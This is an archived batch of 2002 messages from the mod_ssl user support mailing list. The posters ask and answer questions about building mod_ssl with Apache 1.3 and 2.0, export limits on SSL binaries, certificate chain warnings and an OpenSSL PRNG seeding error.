Content-Transfer-Encoding: 7bit

Martin Kraemer wrote:

> Ralf, do you have a mod_ssl patch for the current 1.3.25-dev proxy? Or
> could you make one?

Is 1.3.25 not due for release already?

Regards,
Graham
-- 
-----------------------------------------
minfrin@sharp.fm		"There's a moon
					over Bourbon Street
						tonight..."
--------------msD8A87393AF2CD0604ABEFF32
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIIHyAYJKoZIhvcNAQcCoIIHuTCCB7UCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
BcYwggKVMIIB/qADAgECAgMEyOwwDQYJKoZIhvcNAQEEBQAwgZIxCzAJBgNVBAYTAlpBMRUw
EwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhh
d3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwg
RnJlZW1haWwgUlNBIDIwMDAuOC4zMDAeFw0wMTA1MTEwMDE3NDZaFw0wMjA1MTEwMDE3NDZa
MF0xEDAOBgNVBAQTB0xlZ2dldHQxDzANBgNVBCoTBkdyYWhhbTEXMBUGA1UEAxMOR3JhaGFt
IExlZ2dldHQxHzAdBgkqhkiG9w0BCQEWEG1pbmZyaW5Ac2hhcnAuZm0wgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBALX2zJvQ/9l+sCEpkfMNNwtnMcF8vmPM2sRpibT5nR87bYWyLVCt
XXWXU+UyDOkiQJt6UahnmYZV7u40a1/osbNnjHjyNybejOuUFjHYy1gDwjsElnxYbRRA2SZc
CmrZ4V0QFI0ZKuimGryZQj77UroiIV+Qq+v+PaxDEGwiqJqnAgMBAAGjLTArMBsGA1UdEQQU
MBKBEG1pbmZyaW5Ac2hhcnAuZm0wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQQFAAOBgQCO
l5bH8JXuFM+EZi01jfezzKML5iPBHx4BDj/4gl2lXw1t0v6o+9442F6TpnOVAk3LL1KTupvc
HfM+Bn71iWuD8ASCoSsmVpeoCbOv3lPGltrDgywcmM8phZyK1hHLvvJgfd4IMZbuH/rm0ZWp
WjRORFfik8yuO9DgahgjgAhkujCCAykwggKSoAMCAQICAQwwDQYJKoZIhvcNAQEEBQAwgdEx
CzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93
bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRpZmljYXRpb24g
U2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBD
QTErMCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw0wMDA4
MzAwMDAwMDBaFw0wMjA4MjkyMzU5NTlaMIGSMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2Vz
dGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRoYXd0ZTEdMBsGA1UE
CxMUQ2VydGlmaWNhdGUgU2VydmljZXMxKDAmBgNVBAMTH1BlcnNvbmFsIEZyZWVtYWlsIFJT
QSAyMDAwLjguMzAwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN4zMqZjxwklRT7Sbngn
Z4HF2ogZgpcO40QpimM1Km1wPPrcrvfudG8wvDOQf/k0caCjbZjxw0+iZdsN+kvx1t1hpfmF
zVWaNRqdknWoJ67Ycvm6AvbXsJHeHOmr4BgDqHxDQlBRh4M88Dm0m1SKE4f/s5udSWYALQmJ
7JRr6aFpAgMBAAGjTjBMMCkGA1UdEQQiMCCkHjAcMRowGAYDVQQDExFQcml2YXRlTGFiZWwx
LTI5NzASBgNVHRMBAf8ECDAGAQH/AgEAMAsGA1UdDwQEAwIBBjANBgkqhkiG9w0BAQQFAAOB
gQBzG28mZYv/FTRLWWKK7US+ScfoDbuPuQ1qJipihB+4h2N0HG23zxpTkUvhzeY42e1Q9Dps
NJKs5pKcbsEjAcIJp+9LrnLdBmf1UG8uWLi2C8FQV7XsHNfvF7bViJu3ooga7TlbOX00/LaW
GCVNavSdxcORL6mWuAU8Uvzd6WIDSDGCAcowggHGAgEBMIGaMIGSMQswCQYDVQQGEwJaQTEV
MBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRo
YXd0ZTEdMBsGA1UECxMUQ2VydGlmaWNhdGUgU2VydmljZXMxKDAmBgNVBAMTH1BlcnNvbmFs
IEZyZWVtYWlsIFJTQSAyMDAwLjguMzACAwTI7DAJBgUrDgMCGgUAoIGGMBgGCSqGSIb3DQEJ
AzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMDUwMjE0MzAyMlowIwYJKoZIhvcN
AQkEMRYEFJ/bjPGBxO5G57Qj+BwhhCdeBQRZMCcGCSqGSIb3DQEJDzEaMBgwBwYFKw4DAgcw
DQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYCBvWNTR3BnqD0lQGR5APmtl6gzde/T
CNWotIbau/MxBWpMkSJwwcr8AUE/nMzeKP2I8q2puAUuHl0LeyWWxRtP1hwIVUUmMVVgczsw
BXrNGIpehRzmjsM2v9XkhtfR1fi60jyOAkmpwzSm/ET+6dPiD2riIn323S1o9so+Vmc2JA==
--------------msD8A87393AF2CD0604ABEFF32--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 20:18:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA28031; Thu, 2 May 2002 20:17:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id UAA27950; Thu, 2 May 2002 20:16:24 +0200 (MET DST)
Subject: Some help
Date: Thu, 2 May 2002 20:16:19 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C1F205.74BA8DDC"
Thread-Topic: Some help
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Index: AcHyBXRK2ErkK8GhQ0SVxwPfYJoo5g==
From: "Frederic DONNAT" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C1F205.74BA8DDC
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi All,

I quite new to mod-ssl and apache 2.0.x, so i have a few question.

With Apache 1.3.x, i was use to call openssl engine througth mod-ssl, =
with some compilation condition (--enable-rule=3DSSL_ExPERIMENTAL), and =
http.conf modification (SSLCryptoDevice ...).=20

My problem comes with new Apache 2.0.x!
Am i right if i try to compile mod-ssl with the same rule adding =
"--enable-rule=3DSSL_ExPERIMENTAL" when doing ./configure for apache?
If i do not misundersand, we can have compilation directive for module =
(as mod-ssl) from apache configuration script?
Should i be able to use an openssl engine using the same =
"SSLCryptoDevice ..."?

Thanks in advance.
Regards
Fred

------_=_NextPart_001_01C1F205.74BA8DDC
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable






Some help





Hi All,



I quite new to mod-ssl and apache 2.0.x, so i have a few question.



With Apache 1.3.x, i was use to call openssl engine througth mod-ssl, =
with some compilation condition (--enable-rule=3DSSL_ExPERIMENTAL), and =
http.conf modification (SSLCryptoDevice ...).



My problem comes with new Apache 2.0.x!

Am i right if i try to compile mod-ssl with the same rule adding =
"--enable-rule=3DSSL_ExPERIMENTAL" when doing ./configure for =
apache?

If i do not misundersand, we can have compilation directive for module =
(as mod-ssl) from apache configuration script?

Should i be able to use an openssl engine using the same =
"SSLCryptoDevice ..."?



Thanks in advance.

Regards

Fred





------_=_NextPart_001_01C1F205.74BA8DDC--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 21:30:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA03052; Thu, 2 May 2002 21:29:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA03004; Thu, 2 May 2002 21:28:58 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g42JSPc12016
	for ; Thu, 2 May 2002 15:28:25 -0400
Date: Thu, 2 May 2002 15:28:25 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.36 with mod_ssl and working SSL-ProxyPass for Windows
 (NT or 2000) ???
In-Reply-To: <3CD12AA0.7000105@web.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 2 May 2002, Johannes Artur Bertscheit wrote:

> Is it planned to test the next release 2.0.36 on windows / support it
> for windows including SSL-ProxyPass?

Current release schedule has 2.0.36 coming out on Monday.  Win32 binaries
will be provided and are well-supported.  BUT: official binaries from
apache.org don't include mod_ssl due to ongoing questions of export
restrictions.  You can compile it yourself with VC6.  ProxyPass
https->http has been fixed.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 21:45:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA03877; Thu, 2 May 2002 21:44:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id VAA03817; Thu, 2 May 2002 21:43:22 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 2 May 2002 19:34:23 UT
Received: (private information removed)
Received: from no.name.available by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 2 May 2002 19:34:22 UT
Message-ID: <3CD197B9.0@espgroup.net>
Date: Thu, 02 May 2002 15:47:05 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.36 with mod_ssl and working SSL-ProxyPass for Windows
 (NT or 2000) ???
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

First I've seen of the SSL issues still remaining.  I thought 2.0 WOULD 
have SSL because the SSL restrictions went away.  Can you point me to a 
location where I can catch up on the ongoing discussions/questions?

Not that I have a problem compiling it... just curious.

Thanks.

Cliff Woolley wrote:

>On Thu, 2 May 2002, Johannes Artur Bertscheit wrote:
>
>  
>
>>Is it planned to test the next release 2.0.36 on windows / support it
>>for windows including SSL-ProxyPass?
>>    
>>
>
>Current release schedule has 2.0.36 coming out on Monday.  Win32 binaries
>will be provided and are well-supported.  BUT: official binaries from
>apache.org don't include mod_ssl due to ongoing questions of export
>restrictions.  You can compile it yourself with VC6.  ProxyPass
>https->http has been fixed.
>
>--Cliff
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 21:52:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA04364; Thu, 2 May 2002 21:51:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA04286; Thu, 2 May 2002 21:50:25 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g42Jnqf12755
	for ; Thu, 2 May 2002 15:49:52 -0400
Date: Thu, 2 May 2002 15:49:52 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.36 with mod_ssl and working SSL-ProxyPass for Windows
 (NT or 2000) ???
In-Reply-To: <3CD197B9.0@espgroup.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 2 May 2002, Dwayne Miller wrote:

> First I've seen of the SSL issues still remaining.  I thought 2.0 WOULD
> have SSL because the SSL restrictions went away.  Can you point me to a
> location where I can catch up on the ongoing discussions/questions?
> Not that I have a problem compiling it... just curious.

I honestly haven't followed it that closely.  It's something along the
lines of it's clear that we can distribute _source_ for strong encryption
software from within the US, but it's not clear that we can distribute
_binaries_ of strong encryption software.  I personally think that's
ridiculous, but some of the developers involved with creating the binary
distributions just felt that this was the safer path until the government
makes it clearer to us what's allowed and what's not.  Search the archives
for dev@httpd.apache.org, it's in there somewhere.

--Cliff


--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 22:54:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA08310; Thu, 2 May 2002 22:53:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlanta.pop3now.com id WAA08244; Thu, 2 May 2002 22:52:18 +0200 (MET DST)
From: rmckeever@earthlink.net
Received: (from nobody@localhost)
	by atlanta.pop3now.com (8.11.2/8.11.2) id g42KqGi11217;
	Thu, 2 May 2002 16:52:16 -0400
Date: Thu, 2 May 2002 16:52:16 -0400
Message-Id: <200205022052.g42KqGi11217@atlanta.pop3now.com>
To: modssl-users@modssl.org
Subject: Whats this when running httpd -l?
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmckeever@earthlink.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have installed mod_ssl/2.8.7 for Apache/1.3.23 on Solaris 8
and did the install the "The All-In-One mod_ssl way" this was my 
configure state in mod_ssl dir:
# ./configure --with-apache=/opt/apache --with-ssl=/usr/local/ssl --
prefix=/opt/apache --enable-module=most --enable-module=so --enable-
module=ssl --enable-shared=max

Everthing seemed to install fine I created my custom keys and was 
able to run apachectl startssl and entered in my Pass phrase and the 
httpd -DSSL started fine. Was also able to go to default web page...


Time for question:
I have a habit of running httpd -l, for some reason when I run it on 
this system I get this message:

# ./httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c
suexec: disabled; invalid wrapper /opt/apache/bin/suexec
#

Whats "suexec: disabled; invalid wrapper /opt/apache/bin/suexec" ?


I did add an extra --enable-module to the configure statement:
 --enable-module=ssl 

Is that a problem to have to many/conflicting "--enable-module=" in a 
configure statement? 

Thanks for your time,
Rob


--
Pop3Now Personal, Get quick remote access to your email accounts!
Sign Up Now!  Visit http://www.pop3now.com/personal

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 23:24:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA10392; Thu, 2 May 2002 23:23:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA10325; Thu, 2 May 2002 23:22:10 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g42LLbi13770
	for ; Thu, 2 May 2002 17:21:37 -0400
Date: Thu, 2 May 2002 17:21:37 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Whats this when running httpd -l?
In-Reply-To: <200205022052.g42KqGi11217@atlanta.pop3now.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 2 May 2002 rmckeever@earthlink.net wrote:

> suexec: disabled; invalid wrapper /opt/apache/bin/suexec

No, it just means you probably left out the --enable-suexec or one of the
--with-suexec-foo arguments to ./configure.

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  2 23:50:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA11937; Thu, 2 May 2002 23:49:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from worf.andebakken.dk id XAA11916; Thu, 2 May 2002 23:48:51 +0200 (MET DST)
Received: (qmail 6100 invoked from network); 2 May 2002 21:45:33 -0000
Received: from riker.andebakken.dk (HELO riker) (192.168.225.10)
  by worf.andebakken.dk with SMTP; 2 May 2002 21:45:33 -0000
From: "Brian Ipsen" 
To: 
Subject: Problems with Globalsign certificate ?
Date: Thu, 2 May 2002 23:48:02 +0200
Message-ID: <004301c1f223$092a2a60$0ae1a8c0@andebakken.dk>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Ipsen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

 I've just received a Globalsign certificate for running https on an Apache
server with mod_ssl. The apache starts up without any problems, but when a
clients connects to the server with https (the client is using Internet
Explorer 5.5), the user gets a warning, and the "certification path" tab in
IE says: "This certificate cannot be verified up to a trusted certification
authority."
 The General tab/pane says: "This CA Root certificate is not trusted. To
enable trust, install this certificate in the Trusted Root Certification
Authorities store."

 I thought when using Globalsign the CA was valid and known by IE - I know
it doesn't complaint when ordering the certificate, and as far as I remember
they have signed their own certificate, so IE should know about
Globalsign...

 I have downloaded the root certificate and installed it in my ssl.crt
directory (http://support.globalsign.net/en/serversign/apachemodssl.cfm) -
the only difference is that I compiled apache and mod_ssl before requestion
the certificate - but that should hopefully not affect anything which can
result in the problem I'm seeing right now...

Anyone ??

/Brian

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 10:15:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA10351; Fri, 3 May 2002 10:14:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA10230; Fri, 3 May 2002 10:13:50 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 070B44CE740; Fri,  3 May 2002 10:13:49 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g437OMg13530; Fri, 3 May 2002 09:24:22 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vonemailsweep2.voneaccount.com id IAA01482; Fri, 3 May 2002 08:55:23 +0200 (MET DST)
Received: from vonewpnotes (unverified) by vonemailsweep2.voneaccount.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Fri, 3 May 2002 07:59:15 +0100
Subject: Re: Problems with Globalsign certificate ?
To: modssl-users@modssl.org
From: mike.innes@Oneaccount.com
Date: Fri, 3 May 2002 07:55:15 +0100
Message-ID: 
X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.8 |June
 18, 2001) at 05/03/2002 07:55:16 AM
MIME-Version: 1.0
Content-type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mike.innes@Oneaccount.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Brian,
     I think globasign suggest using the SSLCACertificatePath directive,
use SSLCertificateChainFile instead and see if that works.
Regards.
Mikey





"Brian Ipsen"  on 02/05/2002 21:48:02

Please respond to modssl-users@modssl.org

To:   modssl-users@modssl.org
cc:

Subject:  Problems with Globalsign certificate ?






Hi!

 I've just received a Globalsign certificate for running https on an Apache
server with mod_ssl. The apache starts up without any problems, but when a
clients connects to the server with https (the client is using Internet
Explorer 5.5), the user gets a warning, and the "certification path" tab in
IE says: "This certificate cannot be verified up to a trusted certification
authority."
 The General tab/pane says: "This CA Root certificate is not trusted. To
enable trust, install this certificate in the Trusted Root Certification
Authorities store."

 I thought when using Globalsign the CA was valid and known by IE - I know
it doesn't complaint when ordering the certificate, and as far as I
remember
they have signed their own certificate, so IE should know about
Globalsign...

 I have downloaded the root certificate and installed it in my ssl.crt
directory (http://support.globalsign.net/en/serversign/apachemodssl.cfm) -
the only difference is that I compiled apache and mod_ssl before requestion
the certificate - but that should hopefully not affect anything which can
result in the problem I'm seeing right now...

Anyone ??

/Brian

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org











All telephone calls are recorded and may be monitored.

E-mail communication is not secure and may be intercepted
by a third party. This message is confidential to the intended addressee.
If you are not the intended addressee, please inform us immediately and then
delete this message. Virgin One account does not accept responsibility for
changes made to this message after it was sent. Although Virgin One account
believes this e-mail is free of any virus or other defect which may affect a
computer, it is the responsibility of the recipient to ensure that it is
virus free and Virgin One account does not accept any responsibility for any
loss or damage arising from its use.

The Virgin One account is a secured personal bank account with The Royal Bank
of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an
Introducer representative only of Virgin Money Personal Financial Service Ltd,
which is authorised by the Financial Services Authority for life insurance,
pension and unit trust business and represents only the Virgin Money marketing
group.

Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK.
Registered in England no 3414708.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 13:39:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA00124; Fri, 3 May 2002 13:38:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th11.opsion.fr id NAA00039; Fri, 3 May 2002 13:37:15 +0200 (MET DST)
Received: from 212.180.95.194 [212.180.95.194] by th11.opsion.fr id 200205031137.048b; Fri, 3 May 2002 11:37:05 GMT
Subject: Re: Some help
From: Estrade Matthieu 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
	
Content-Type: text/plain; charset=ISO-8859-15
X-Mailer: Ximian Evolution 1.0.3 
Date: 03 May 2002 13:37:11 +0200
Message-Id: <1020425834.1184.3.camel@RainbowClient>
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA00109
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

To compile your apache with this flags, --enable-rule is not working for
me, so i did it like:
bash# CFLAGS="-DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure....

regards
Estrade Matthieu



Le jeu 02/05/2002 à 20:16, Frederic DONNAT a écrit :
> Hi All,
> 
> I quite new to mod-ssl and apache 2.0.x, so i have a few question.
> 
> With Apache 1.3.x, i was use to call openssl engine througth mod-ssl, with some compilation condition (--enable-rule=SSL_ExPERIMENTAL), and http.conf modification (SSLCryptoDevice ...). 
> 
> My problem comes with new Apache 2.0.x!
> Am i right if i try to compile mod-ssl with the same rule adding "--enable-rule=SSL_ExPERIMENTAL" when doing ./configure for apache?
> If i do not misundersand, we can have compilation directive for module (as mod-ssl) from apache configuration script?
> Should i be able to use an openssl engine using the same "SSLCryptoDevice ..."?
> 
> Thanks in advance.
> Regards
> Fred


 
______________________________________________________________________________
ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP...
http://www.ifrance.com/_reloc/email.emailif


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 17:00:01 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA13247; Fri, 3 May 2002 16:59:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lemonlainey.com id QAA13198; Fri, 3 May 2002 16:58:07 +0200 (MET DST)
Received: from cscm1xn8ksljgv by lemonlainey.com
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Fri, 03 May 2002 15:57:35 +0100
Message-ID: <002c01c1f2b2$e13c2400$3281b2d5@iii.co.uk>
From: "Kevin Smith" 
To: 
Cc: 
Subject: Apache SSL
Date: Fri, 3 May 2002 15:57:40 +0100
Organization: Netsmith Limited
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0029_01C1F2BB.40FF16B0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Lookup-Warning: reverse lookup on original sender failed
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin Smith" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0029_01C1F2BB.40FF16B0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi All,

Does anyone know how to get round this problem when starting-up Apache =
SSL :

I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not sure =
what's wrong ?

[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate =
temporary 512 bit RSA private key (OpenSSL library error follows)
[Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number =
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa =
routines:RSA_generate_key:BN lib


Many thanks,

Kevin Smith

------=_NextPart_000_0029_01C1F2BB.40FF16B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi All,



Does anyone know how to get round this problem when starting-up =
Apache=20
SSL :


 


I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so =
not=20
sure what's wrong ?

 


[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to =
generate=20
temporary 512 bit RSA private key (OpenSSL library error =
follows)
[Fri=20
May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number =

generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri May  3 15:55:06 =
2002]=20
[error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN =
lib


 


Many thanks,


 


Kevin Smith


------=_NextPart_000_0029_01C1F2BB.40FF16B0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
